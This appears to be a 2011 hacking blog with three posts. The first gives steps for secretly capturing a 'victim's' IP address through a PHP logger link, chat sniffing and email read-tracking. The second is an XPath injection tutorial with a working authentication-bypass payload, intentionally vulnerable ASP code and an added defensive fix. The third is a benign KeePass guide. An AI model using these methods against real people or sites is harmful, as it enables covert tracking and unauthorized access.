Tuesday, 15 November 2011

How To Find IP Address of Remote Machine


Hello GreenHackerz Readers...
This article is about getting the IP address of a remote computer, i.e., in hacking terms, getting the IP address of the victim's computer.

Before proceeding, let's learn something about IP addresses.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication. 
An IP address serves two basic purposes:
1. Host or network interface identification
2. Location addressing

Now let's move on to our goal...

0x02-How to get IP address of remote computer or victim computer?
There are four techniques to get the IP address of a remote computer or victim computer. These are as follows:
  1. Using PHP notification script.
  2. Sniffing during chat sessions.
  3. Using Blogs and Websites.
  4. Using read notify service.
Now let's go through them in detail, one by one...

1. Using PHP notification script.
Using this notification script you can get the IP address in just seconds.
Steps for using this PHP script:
   a) First download the PHP Notification Script and extract it.
       You can download this script by clicking the download link below.
       Download: Click Here
   b) Now you will get two files, IP.html and index.php.
       You need to upload these two files to any free web hosting server.
       Here is a list of some free web hosting servers:
       www.my3gb.com
       x10hosting.com
       www.freehostia.com
       www.ripway.com   etc.
       You can find more on the web.
   c) To upload these files you first have to sign up on the website. After uploading the files you will get a link
       to your uploaded files.
       Suppose you open a new account at www.my3gb.com with the subdomain xyz; then your IP link
       would be   http://www.xyz.my3gb.com/index.php
   d) Now you need to send the link to index.php to the victim whose IP address you want to get.
   e) When the victim opens the above link, nothing will open, but his IP address is written into the
       ip.html file. So open the ip.html file to get his IP address.
   f) That's all about this method... hope you understood it.

2. Sniffing during chat sessions.
With the help of sniffers like Wireshark, you can sniff Gmail, Yahoo or any other chat session while you are chatting with any of your friends and extract the IP address from there. You can read about the Wireshark tool by clicking on the link below.
http://www.greenhackerz.com/2011/09/wireshark.html

3. Using Blogs and Websites.
This method is for those who have their own blogs or websites. Normal users can also do this, as a blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget, put the histats code there and save the template. Then send the link to your blog to your friend and get his IP.

4. Using read notify service.
Read Notify is an email-based service.
The steps to use the Read Notify service are as follows:
   a) First open the Read Notify website : RCPT
   b) Now register on this website; it will then send you a confirmation mail. Verify your account.
   c) Once your account is activated, do the following steps to use this service:
  1. Compose your email just like you usually would in your own email or web email program.
  2. Type: .readnotify.com on the end of your recipient's email address (don't worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
  3. Send your email.
Some things to remember:
  • Don't send to and from the same computer.
  • If your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com .
  • If you are cc-ing your email to other readers, you must add tracking to all of them.
I hope this article is beneficial for you. Enjoy the tips and tricks.



Wednesday, 09 November 2011

XPath Injection


Hello GreenHackerz Readers...
This article is about a technique used to exploit websites. The technique is named "XPath Injection".
So let's start reading...

0x01-XPath Injection Description.

Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match.

When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects, as there are in requests to SQL databases. Because there is no access control, it's possible to get the entire document. We won't encounter the limitations we know from SQL injection attacks.
Example:

Input the query as shown in the image below:

You get the result as shown below:

The result includes a lot of sensitive information; from it you can conclude that the application uses an XML file to store user authentication data.

In order to analyse the injection process, we modify the server script to output the query to the user's browser. Input the following username or password:
999'] | * | user[@role='admin

Result:

The text in the red frame is the XPath query. 999'] | * | user[@role='admin has been injected into the query successfully.

Now, let's see the source code of index.asp:
<script language="javascript" runat="server">
// Login page that authenticates against user.xml with an XPath query.
Response.write("<html><body>");
// Raw form input, used below without any validation.
var uid=Request.form("uid");
var pwd=Request.form("pwd");
Response.write("<form method=\"POST\">Username:<input name=\"uid\" size=\"20\"/><br>Password:<input name=\"pwd\" size=\"20\"/><input type=\"submit\" value=\"Login\"/></form>");
var xmlDom=new ActiveXObject("Microsoft.XMLDOM");
xmlDom.async=false;
xmlDom.load("/Inetpub/wwwroot/xpath/user.xml");
// Vulnerable line: the query is built by concatenating user input.
var auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']";
// Debug output added for the analysis: echo the query to the browser.
Response.write(auth);
var UserObj=xmlDom.selectNodes(auth);
if(UserObj.length>0) Response.write("<br><br>Login OK!");
else Response.write("Please Input Correct Username and Password!");
Response.write(UserObj.Xml);
// Dump every node the query matched.
for(var i=0;i<UserObj.length;i++)
{
Response.write("<xmp>");
Response.write(UserObj(i).xml);
Response.write("</xmp>");
}
Response.write("</body></html>");
</script>

The user authentication file user.xml:
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <firstname>Ben</firstname>
    <lastname>Elmore</lastname>
    <loginID>abc</loginID>
    <password>test123</password>
  </user>
  <user>
    <firstname>Shlomy</firstname>
    <lastname>Gantz</lastname>
    <loginID>xyz</loginID>
    <password>123test</password>
  </user>
</users>

The XPath query is built as follows:
auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']"
It means: select the user nodes whose uid is equal to your input uid and whose password is equal to your input pwd.
With the injected input, the actual XPath query becomes:
//users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin']
The logical result is to select all nodes; XPath injection has occurred.
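
The fix for the concatenation in index.asp, as an added example that is not part of the original post: user input is turned into an XPath string literal before it is placed in the query, and a skeleton comparison shows that the input from the post no longer changes the query's structure. The function names and the login-ID allow-list are assumptions made for this illustration; no XPath engine is needed to run it.

```javascript
// Added example, not code from the original post. All function names are hypothetical.

// Vulnerable builder: the same concatenation index.asp performs.
function buildAuthQueryUnsafe(uid, pwd) {
  return "//users/user[loginID/text()='" + uid +
         "' and password/text()='" + pwd + "']";
}

// XPath 1.0 string literals have no escape character. Quote the value with
// the delimiter it does not contain; if it contains both, split it on ' and
// reassemble the pieces with concat().
function xpathLiteral(value) {
  const s = String(value);
  if (!s.includes("'")) return "'" + s + "'";
  if (!s.includes('"')) return '"' + s + '"';
  const parts = s.split("'").map((p) => "'" + p + "'");
  return "concat(" + parts.join(", \"'\", ") + ")";
}

// Hardened builder: user input can only ever be the content of a literal.
function buildAuthQuerySafe(uid, pwd) {
  return "//users/user[loginID/text()=" + xpathLiteral(uid) +
         " and password/text()=" + xpathLiteral(pwd) + "]";
}

// Extra layer: allow-list for login IDs (assumed policy, not from the post).
function isPlausibleLoginId(uid) {
  return /^[A-Za-z0-9._-]{1,64}$/.test(uid);
}

// Skeleton of a query: everything outside string literals, each literal
// replaced by "?", and a concat(?, ?, ...) produced by xpathLiteral folded
// back to "?". Returns null when a literal is left unterminated.
function querySkeleton(query) {
  let out = "";
  let quote = null;
  for (const ch of query) {
    if (quote !== null) {
      if (ch === quote) quote = null;
      continue;
    }
    if (ch === "'" || ch === '"') {
      quote = ch;
      out += "?";
    } else {
      out += ch;
    }
  }
  if (quote !== null) return null;
  return out.replace(/concat\(\?(?:, \?)+\)/g, "?");
}

// True when the input changed the query's structure relative to a benign login.
function isInjected(build, uid, pwd) {
  return querySkeleton(build(uid, pwd)) !== querySkeleton(build("a", "b"));
}

// The input shown in the post, passed as the password.
const PAYLOAD = "999'] | * | user[@role='admin";
console.log(buildAuthQueryUnsafe("999", PAYLOAD));
console.log(buildAuthQuerySafe("999", PAYLOAD));
console.log("unsafe injected:", isInjected(buildAuthQueryUnsafe, "999", PAYLOAD));
console.log("safe injected:  ", isInjected(buildAuthQuerySafe, "999", PAYLOAD));
```

The same skeleton comparison can be run over logged queries to flag requests whose input altered the query structure.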

0x02-XPath Injection Tool
WebCruiser - Web Vulnerability Scanner
WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool!
It has a Crawler and a Vulnerability Scanner (SQL Injection, Cross Site Scripting, XPath Injection etc.).
It supports scanning websites as well as POC (Proof of Concept) for web vulnerabilities:
SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also a SQL Injector,
an XPath Injector, and a Cross Site Scripting tool!
Functions:
  • Crawler (Site Directories And Files);
  • Vulnerability Scanner (SQL Injection, Cross Site Scripting, XPath Injection etc.);
  • POC (Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
  • GET/Post/Cookie Injection;
  • SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
  • MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
  • Administration Entrance Search;
  • Time Delay For Search Injection;
  • Auto Get Cookie From Web Browser For Authentication;
  • Report Output.
Besides this, there are also some other good Web Vulnerability Scanner tools available on the market, like Acunetix, Grendel-Scan etc.

Hope you like the article.
Enjoy XPath Injection


Tuesday, 01 November 2011

Keep All Passwords In Pocket !!


Hello GreenHackerz..
Today's biggest problem for us is remembering all our passwords, because today we need to remember many of them. We need a password for the Windows network logon, our e-mail account, our website's FTP account, online accounts (like website member accounts), etc., and one of the most important passwords for young people is the Facebook account password.. :)

The list is endless. Also, we should use a different password for each account, because if we use only one password everywhere and someone gets this password, we have a problem... even a serious problem. The thief (hacker) would have access to our e-mail account, website, etc.
Here is the simple solution. You can securely save all your passwords on a USB device or even on an iPod and keep it in your pocket with KeePass Password Safe.
For Download Click Here

What is KeePass?
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Visit official website Click Here

How To Use

(1) Simply download KeePass.

(2) Extract it to your pen drive or to your desired location.

(3) Open KeePass.exe and click on New to create a new database for your passwords, then give it a strong password or make a key file for your database.

(4) Now you can simply add an entry.

(5) Your entries look like this.

(6) You can use the autotype feature by simply pressing Ctrl+V; if the database is open, it automatically fills in the username and password and logs in to your account.

Enjoy, friends, with KeePass Safe..
